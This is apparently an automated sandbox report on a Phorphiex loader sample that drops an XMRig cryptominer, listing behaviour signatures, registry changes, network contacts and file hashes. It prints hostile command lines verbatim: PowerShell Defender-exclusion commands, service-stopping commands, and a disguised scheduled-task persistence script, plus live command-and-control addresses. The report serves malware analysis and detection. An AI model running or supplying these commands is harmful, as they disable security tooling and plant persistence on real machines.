Analysis Overview
SHA256
27df607e4a1cbfc7c3a99a8b7d4644b85502a80587772dbac4975e08c7189e98
Threat Level: Known bad
The file 2024-11-06_dbf5cc46257e16d6a694c1be8972afdf_icedid was found to be: Known bad.
Malicious Activity Summary
Windows security bypass
Modifies security service
Phorphiex family
Phorphiex, Phorpiex
xmrig
Phorphiex payload
Xmrig family
Suspicious use of NtCreateUserProcessOtherParentProcess
XMRig Miner payload
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Stops running service(s)
Windows security modification
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Adds Run key to start application
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Windows directory
Launches sc.exe
System Location Discovery: System Language Discovery
Unsigned PE
Enumerates physical storage devices
Suspicious use of SendNotifyMessage
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-06 14:46
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-06 14:46
Reported
2024-11-06 14:48
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4" | C:\Windows\sysppvrdnvs.exe | N/A |
Phorphiex family
Phorphiex payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Phorphiex, Phorpiex
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1900 created 3444 | N/A | C:\Users\Admin\AppData\Local\Temp\2155214652.exe | C:\Windows\Explorer.EXE |
| PID 1900 created 3444 | N/A | C:\Users\Admin\AppData\Local\Temp\2155214652.exe | C:\Windows\Explorer.EXE |
| PID 976 created 3444 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
| PID 976 created 3444 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
| PID 976 created 3444 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
Xmrig family
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Stops running service(s)
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Windows\sysppvrdnvs.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\105765520.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A49C.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1303511795.exe | N/A |
| N/A | N/A | C:\Windows\sysppvrdnvs.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\105765520.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1428129604.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1252821226.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2155214652.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1623412542.exe | N/A |
| N/A | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiSpywareOverride = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\sysppvrdnvs.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysppvrdnvs.exe" | C:\Users\Admin\AppData\Local\Temp\1303511795.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 976 set thread context of 1172 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\System32\conhost.exe |
| PID 976 set thread context of 3908 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\System32\dwm.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\sysppvrdnvs.exe | C:\Users\Admin\AppData\Local\Temp\1303511795.exe | N/A |
| File opened for modification | C:\Windows\sysppvrdnvs.exe | C:\Users\Admin\AppData\Local\Temp\1303511795.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1623412542.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\sysppvrdnvs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1428129604.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1252821226.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\A49C.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1303511795.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2024-11-06_dbf5cc46257e16d6a694c1be8972afdf_icedid.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
| N/A | N/A | C:\Windows\System32\dwm.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\2024-11-06_dbf5cc46257e16d6a694c1be8972afdf_icedid.exe
"C:\Users\Admin\AppData\Local\Temp\2024-11-06_dbf5cc46257e16d6a694c1be8972afdf_icedid.exe"
C:\Users\Admin\AppData\Local\Temp\A49C.exe
"C:\Users\Admin\AppData\Local\Temp\A49C.exe"
C:\Users\Admin\AppData\Local\Temp\1303511795.exe
C:\Users\Admin\AppData\Local\Temp\1303511795.exe
C:\Windows\sysppvrdnvs.exe
C:\Windows\sysppvrdnvs.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
C:\Windows\SysWOW64\sc.exe
sc stop UsoSvc
C:\Windows\SysWOW64\sc.exe
sc stop WaaSMedicSvc
C:\Windows\SysWOW64\sc.exe
sc stop wuauserv
C:\Windows\SysWOW64\sc.exe
sc stop DoSvc
C:\Windows\SysWOW64\sc.exe
sc stop BITS /wait
C:\Users\Admin\AppData\Local\Temp\105765520.exe
C:\Users\Admin\AppData\Local\Temp\105765520.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Users\Admin\AppData\Local\Temp\1428129604.exe
C:\Users\Admin\AppData\Local\Temp\1428129604.exe
C:\Users\Admin\AppData\Local\Temp\1252821226.exe
C:\Users\Admin\AppData\Local\Temp\1252821226.exe
C:\Users\Admin\AppData\Local\Temp\2155214652.exe
C:\Users\Admin\AppData\Local\Temp\2155214652.exe
C:\Users\Admin\AppData\Local\Temp\1623412542.exe
C:\Users\Admin\AppData\Local\Temp\1623412542.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe
"C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Windows\System32\dwm.exe
C:\Windows\System32\dwm.exe
Network
| Country | Destination | Domain | Proto |
| RU | 185.215.113.66:80 | 185.215.113.66 | tcp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.113.215.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | twizt.net | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.update.microsoft.com | udp |
| US | 20.109.209.108:80 | www.update.microsoft.com | tcp |
| US | 8.8.8.8:53 | 108.209.109.20.in-addr.arpa | udp |
| KZ | 2.135.121.134:40500 | N/A | udp |
| KZ | 89.218.184.42:40500 | N/A | tcp |
| US | 8.8.8.8:53 | 134.121.135.2.in-addr.arpa | udp |
| UZ | 213.206.50.15:40500 | N/A | udp |
| US | 8.8.8.8:53 | 15.50.206.213.in-addr.arpa | udp |
| IR | 5.202.245.192:40500 | N/A | udp |
| US | 8.8.8.8:53 | 192.245.202.5.in-addr.arpa | udp |
| UZ | 89.249.62.7:40500 | N/A | udp |
| US | 8.8.8.8:53 | 7.62.249.89.in-addr.arpa | udp |
| KZ | 89.218.172.78:40500 | N/A | udp |
| US | 8.8.8.8:53 | 78.172.218.89.in-addr.arpa | udp |
| SY | 185.145.237.247:40500 | N/A | udp |
| MX | 189.150.35.54:40500 | N/A | tcp |
| US | 8.8.8.8:53 | 247.237.145.185.in-addr.arpa | udp |
| YE | 81.91.31.245:40500 | N/A | udp |
| US | 8.8.8.8:53 | 245.31.91.81.in-addr.arpa | udp |
| IR | 185.71.152.222:40500 | N/A | udp |
| US | 8.8.8.8:53 | 222.152.71.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
| IR | 5.219.43.38:40500 | N/A | udp |
| US | 8.8.8.8:53 | 38.43.219.5.in-addr.arpa | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| IR | 2.190.148.34:40500 | N/A | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 8.8.8.8:53 | 34.148.190.2.in-addr.arpa | udp |
| KZ | 92.46.228.246:40500 | N/A | udp |
| US | 8.8.8.8:53 | 246.228.46.92.in-addr.arpa | udp |
| US | 198.163.203.205:40500 | N/A | tcp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| IR | 188.213.103.164:40500 | N/A | udp |
| US | 8.8.8.8:53 | 164.103.213.188.in-addr.arpa | udp |
| KG | 217.29.20.226:40500 | N/A | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 8.8.8.8:53 | 226.20.29.217.in-addr.arpa | udp |
| KZ | 88.204.243.150:40500 | N/A | udp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
| US | 8.8.8.8:53 | 150.243.204.88.in-addr.arpa | udp |
| RU | 185.215.113.66:80 | twizt.net | tcp |
| US | 8.8.8.8:53 | 84.113.215.185.in-addr.arpa | udp |
| IR | 78.38.107.167:40500 | N/A | udp |
| US | 8.8.8.8:53 | 167.107.38.78.in-addr.arpa | udp |
| IR | 5.235.177.163:40500 | N/A | udp |
| TM | 91.202.233.141:80 | 91.202.233.141 | tcp |
| US | 8.8.8.8:53 | 163.177.235.5.in-addr.arpa | udp |
| BY | 46.56.85.158:40500 | N/A | tcp |
| US | 8.8.8.8:53 | 141.233.202.91.in-addr.arpa | udp |
| AO | 129.122.232.67:40500 | N/A | udp |
| US | 8.8.8.8:53 | 67.232.122.129.in-addr.arpa | udp |
| US | 8.8.8.8:53 | twizthash.net | udp |
| RU | 185.215.113.66:5152 | twizthash.net | tcp |
| UZ | 90.156.194.63:40500 | N/A | udp |
| US | 8.8.8.8:53 | 63.194.156.90.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\A49C.exe
| MD5 | 8d8e6c7952a9dc7c0c73911c4dbc5518 |
| SHA1 | 9098da03b33b2c822065b49d5220359c275d5e94 |
| SHA256 | feb4c3ae4566f0acbb9e0f55417b61fefd89dc50a4e684df780813fb01d61278 |
| SHA512 | 91a573843c28dd32a9f31a60ba977f9a3d4bb19ffd1b7254333e09bcecef348c1b3220a348ebb2cb08edb57d56cb7737f026519da52199c9dc62c10aea236645 |
C:\Users\Admin\AppData\Local\Temp\1303511795.exe
| MD5 | 06560b5e92d704395bc6dae58bc7e794 |
| SHA1 | fbd3e4ae28620197d1f02bfc24adaf4ddacd2372 |
| SHA256 | 9eaaadf3857e4a3e83f4f78d96ab185213b6528c8e470807f9d16035daadf33d |
| SHA512 | b55b49fc1bd526c47d88fcf8a20fcaed900bfb291f2e3e1186ec196a87127ed24df71385ae04fedcc802c362c4ebf38edfc182013febf4496ddeb66ce5195ee3 |
memory/1988-17-0x0000000005080000-0x00000000050B6000-memory.dmp
memory/1988-18-0x0000000005730000-0x0000000005D58000-memory.dmp
memory/1988-19-0x00000000056A0000-0x00000000056C2000-memory.dmp
memory/1988-20-0x0000000005F90000-0x0000000005FF6000-memory.dmp
memory/1988-21-0x0000000006000000-0x0000000006066000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xdqetpzs.tnp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1988-31-0x0000000006070000-0x00000000063C4000-memory.dmp
memory/1988-32-0x0000000006640000-0x000000000665E000-memory.dmp
memory/1988-33-0x0000000006670000-0x00000000066BC000-memory.dmp
memory/1988-34-0x0000000006C50000-0x0000000006C82000-memory.dmp
memory/1988-35-0x000000006F550000-0x000000006F59C000-memory.dmp
memory/1988-45-0x0000000007840000-0x000000000785E000-memory.dmp
memory/1988-46-0x0000000007860000-0x0000000007903000-memory.dmp
memory/1988-47-0x0000000008030000-0x00000000086AA000-memory.dmp
memory/1988-48-0x0000000007980000-0x000000000799A000-memory.dmp
memory/1988-49-0x00000000079F0000-0x00000000079FA000-memory.dmp
memory/1988-50-0x0000000007C00000-0x0000000007C96000-memory.dmp
memory/1988-51-0x0000000007B90000-0x0000000007BA1000-memory.dmp
memory/1988-52-0x0000000007BC0000-0x0000000007BCE000-memory.dmp
memory/1988-53-0x0000000007BD0000-0x0000000007BE4000-memory.dmp
memory/1988-54-0x0000000007CC0000-0x0000000007CDA000-memory.dmp
memory/1988-55-0x0000000007CA0000-0x0000000007CA8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\H4VCA4X1\1[1]
| MD5 | 1fcb78fb6cf9720e9d9494c42142d885 |
| SHA1 | fef9c2e728ab9d56ce9ed28934b3182b6f1d5379 |
| SHA256 | 84652bb8c63ca4fd7eb7a2d6ef44029801f3057aa2961867245a3a765928dd02 |
| SHA512 | cdf58e463af1784aea86995b3e5d6b07701c5c4095e30ec80cc901ffd448c6f4f714c521bf8796ffa8c47538bf8bf5351e157596efaa7ab88155d63dc33f7dc3 |
C:\Users\Admin\AppData\Local\Temp\105765520.exe
| MD5 | cb8420e681f68db1bad5ed24e7b22114 |
| SHA1 | 416fc65d538d3622f5ca71c667a11df88a927c31 |
| SHA256 | 5850892f67f85991b31fc90f62c8b7791afeb3c08ae1877d857aa2b59471a2ea |
| SHA512 | baaabcc4ad5d409267a34ed7b20e4afb4d247974bfc581d39aae945e5bf8a673a1f8eacae2e6783480c8baaeb0a80d028274a202d456f13d0af956afa0110fdf |
memory/3684-76-0x0000000000B50000-0x0000000000B56000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1428129604.exe
| MD5 | 0c37ee292fec32dba0420e6c94224e28 |
| SHA1 | 012cbdddaddab319a4b3ae2968b42950e929c46b |
| SHA256 | 981d724feebc36777e99513dc061d1f009e589f965c920797285c46d863060d1 |
| SHA512 | 2b60b571c55d0441ba0cfc695f9db5cd12660ebec7effc7e893c3b7a1c6cb6149df487c31b8d748697e260cbc4af29331592b705ea9638f64a711c7a6164628b |
C:\Users\Admin\AppData\Local\Temp\1252821226.exe
| MD5 | 96509ab828867d81c1693b614b22f41d |
| SHA1 | c5f82005dbda43cedd86708cc5fc3635a781a67e |
| SHA256 | a9de2927b0ec45cf900508fec18531c04ee9fa8a5dfe2fc82c67d9458cf4b744 |
| SHA512 | ff603117a06da8fb2386c1d2049a5896774e41f34d05951ecd4e7b5fc9da51a373e3fcf61af3577ff78490cf898471ce8e71eae848a12812fe98cd7e76e1a9ca |
C:\Users\Admin\AppData\Local\Temp\2155214652.exe
| MD5 | 13b26b2c7048a92d6a843c1302618fad |
| SHA1 | 89c2dfc01ac12ef2704c7669844ec69f1700c1ca |
| SHA256 | 1753ad35ece25ab9a19048c70062e9170f495e313d7355ebbba59c38f5d90256 |
| SHA512 | d6aff89b61c9945002a6798617ad304612460a607ef1cfbdcb32f8932ca648bcee1d5f2e0321bb4c58c1f4642b1e0ececc1eb82450fdec7dff69b5389f195455 |
C:\Users\Admin\AppData\Local\Temp\1623412542.exe
| MD5 | c1c2524e6fc9dc3f492248f09cf37d32 |
| SHA1 | fabcb2a675dcb31070d763a2fabc90259921a20d |
| SHA256 | d7c3ed2599c214b4dbcdbb34d2f378cc5a99833cc051143338bf848cc87fda97 |
| SHA512 | ead31dbcd27538dcd734f7568441dc733ae472dbcc475308b69e90f13cc5b1fda5e13afab4241b18006e81b8e52ff9894685a4e8d2cf9161d2b77716119de89f |
memory/216-104-0x000001BB5B0A0000-0x000001BB5B0C2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | cefdf76e0ecda210af3b3b6bb30e4099 |
| SHA1 | 2391475958c37e02c0bab18b04db0d679a7d7b94 |
| SHA256 | 8f1eb32d6e755d4f1be30213deae872c1ff3cd1a1f8d33356b408b2ec4f35158 |
| SHA512 | 1ecead934fad44c60796d9f6e4ff0b1aac55e3aa1f1040d18c11a951a630c993b4b0d57c4b4dbdc0dc308397d1dfe2c7c2bdd4ece1a5b003aa13c28c3ccfc8fb |
memory/1900-119-0x00007FF7FA660000-0x00007FF7FABF7000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | fee026663fcb662152188784794028ee |
| SHA1 | 3c02a26a9cb16648fad85c6477b68ced3cb0cb45 |
| SHA256 | dbd4136bc342e3e92902ec3a30d165452c82997a7ae24ac90775e42d88959e6b |
| SHA512 | 7b12bd5c8fc4356b9123d6586b4980cf76012663b41c0dab6f6f21567e2f4005c5bcea2cc2158d157e4f801a281f3e04bad3774cddb3122db309ccf662184bd6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d95b08252ed624f6d91b46523f110f29 |
| SHA1 | 17577997bc1fb5d3fbe59be84013165534415dc3 |
| SHA256 | 342ce7c39bf9992d31d4b61ef138b2b084c96c74736ed00bb19aae49be16ca02 |
| SHA512 | 0c4288176d56f4ee6d8f08f568fba07ad859f50a395c39d2afd3baf55d3d29ca065a1ce305d1bd790477c35977c0ffa230543e805622f80a77bcee71b24eb257 |
memory/976-137-0x00007FF60E790000-0x00007FF60ED27000-memory.dmp
memory/3908-138-0x000001EE9C480000-0x000001EE9C4A0000-memory.dmp
memory/1172-139-0x00007FF783420000-0x00007FF783449000-memory.dmp
memory/3908-140-0x00007FF6B6610000-0x00007FF6B6DFF000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-06 14:46
Reported
2024-11-06 14:48
Platform
win7-20240903-en
Max time kernel
149s
Max time network
150s
Command Line
Signatures
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Start = "4" | C:\Windows\sysppvrdnvs.exe | N/A |
Phorphiex family
Phorphiex payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Phorphiex, Phorpiex
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2064 created 1200 | N/A | C:\Users\Admin\AppData\Local\Temp\1742823082.exe | C:\Windows\Explorer.EXE |
| PID 2064 created 1200 | N/A | C:\Users\Admin\AppData\Local\Temp\1742823082.exe | C:\Windows\Explorer.EXE |
| PID 1340 created 1200 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
| PID 1340 created 1200 | N/A | C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe | C:\Windows\Explorer.EXE |
